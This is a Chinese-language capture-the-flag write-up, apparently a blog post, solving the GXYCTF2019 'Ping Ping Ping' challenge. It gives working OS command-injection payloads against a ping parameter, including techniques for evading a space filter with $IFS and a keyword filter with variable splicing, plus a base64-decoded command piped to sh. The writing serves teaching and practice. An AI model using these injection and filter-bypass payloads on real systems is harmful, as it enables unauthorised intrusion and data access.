[GXYCTF2019]Ping Ping Ping

1、 点开题目链接发现是ping一个ip的参数

在这里插入图片描述

2、 输入/?ip=127.0.0.1尝试,只出现一个响应,说明是Windows的ping命令
在这里插入图片描述

3、 输入/?ip=127.0.0.1;ls查看当前存在的目录文件夹
在这里插入图片描述

4、输入命令/?ip=127.0.0.1;cat flag.php查看flag文件,发现fxck your space!(关闭你的空间)
说明存在对空格的过滤
在这里插入图片描述

5、网上一般的判断空格过滤方法:判断目标网站是对空格进行了过滤,我们可以使用一些方法代替空格来起到分割作用:
注:%20(space)、%09(tab)、$IFS$9、${IFS}$9、 {IFS}、IFS 都可以。但第一个有时会不行。
此时使用/?ip=127.0.0.1;cat$IFS$9flag.php出现不能直接对flag.php文件操作。
在这里插入图片描述

6、命令:/?ip=127.0.0.1;cat$IFS$9index.php查看第三步出现的index.php的过滤规则,发现对flag字样进行了过滤
在这里插入图片描述

7、解题思路
(1)创建变量实现字符串拼接:构造/?ip=127.0.0.1;b=ag;a=fl;cat$IFS$1$a$b.php即可获取flag 注:此处将变量ab的位置互换是为了绕过字符串匹配

(2)通过执行sh命令来执行 (bash被过滤了,不然也可以执行)
构造/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
注:sh是linux中运行shell的命令,bash相当于sh的升级版,sh∈bash

(3)内联执行(大佬操作)
构造 /?ip=127.0.0.1;cat$IFS$9 ls
在这里插入代码片注:内联,就是将反引号内命令的输出作为输入执行。

8、最后查看网页源代码即可得到flag
(1)得到的结果
在这里插入图片描述

(2)得到的结果
在这里插入图片描述

(3)得到的结果
在这里插入图片描述
9、最后小编陆续为大家更新关于ctf题目的解答,觉得可用的话,点个赞哦!

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值